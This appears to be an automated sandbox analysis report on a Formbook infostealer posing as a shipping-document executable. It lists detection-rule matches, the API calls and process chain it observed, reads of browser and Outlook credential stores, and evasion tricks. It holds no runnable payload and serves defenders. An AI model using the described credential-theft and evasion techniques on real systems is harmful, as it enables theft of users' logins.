            Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/7
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6A0F4 GetLastError,FormatMessageW,0_2_00E6A0F4
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E584F3 AdjustTokenPrivileges,CloseHandle,0_2_00E584F3
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E58AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E58AA3
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E6B3BF
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00E7EF21
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E784D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00E784D0
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E04FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E04FE9
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeFile created: C:\Users\user\AppData\Local\Temp\aut490B.tmpJump to behavior
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000006.00000002.3565934863.0000000003304000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2360663527.0000000003304000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SHIPPING DOC MBL+HBL.exeReversingLabs: Detection: 63%
            Source: SHIPPING DOC MBL+HBL.exeVirustotal: Detection: 35%
            Source: unknownProcess created: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"Jump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: SHIPPING DOC MBL+HBL.exeStatic file information: File size 1280512 > 1048576
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047243039.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3566947457.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7C104 LoadLibraryA,GetProcAddress,0_2_00E7C104
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E68538 push FFFFFF8Bh; iretd 0_2_00E6853A
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2E88F push edi; ret 0_2_00E2E891
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2E9A8 push esi; ret 0_2_00E2E9AA
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E28AC5 push ecx; ret 0_2_00E28AD8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2EB83 push esi; ret 0_2_00E2EB85
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2EC6C push edi; ret 0_2_00E2EC6E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A883 push FFFFFFC7h; retf 1_2_0040AA9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AEA4 push cs; retf 1_2_0040AEAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004036B0 push eax; ret 1_2_004036B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087F2 push ecx; iretd 1_2_004087FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320225F pushad ; ret 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032027FA pushad ; ret 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx1_2_032309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320283D push eax; iretd 1_2_03202858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320135E push eax; iretd 1_2_03201369
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E04A35
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E853DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E853DF
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E23307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E23307
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeAPI/Special instruction interceptor: Address: FEAA1C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9725Jump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-97847
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768Thread sleep count: 247 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768Thread sleep time: -494000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768Thread sleep count: 9725 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768Thread sleep time: -19450000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe TID: 7828Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe TID: 7828Thread sleep time: -31500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E6449B
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E6C7E8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6C75D FindFirstFileW,FindClose,0_2_00E6C75D
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F021
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F17E
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6F47F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E63833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63833
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E63B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63B56
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6BD48
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E04AFE
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000328E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: PrWIbKXhdqUKk.exe, 00000008.00000002.3566544327.000000000075F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
            Source: firefox.exe, 00000009.00000002.2473975943.000002004A35C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeAPI call chain: ExitProcess graph end nodegraph_0-96742
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeAPI call chain: ExitProcess graph end nodegraph_0-97082
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417703 LdrLoadDll,1_2_00417703
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7401F BlockInput,0_2_00E7401F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E03B4C
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E35BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00E35BFC
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7C104 LoadLibraryA,GetProcAddress,0_2_00E7C104
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00FE9658 mov eax, dword ptr fs:[00000030h]0_2_00FE9658
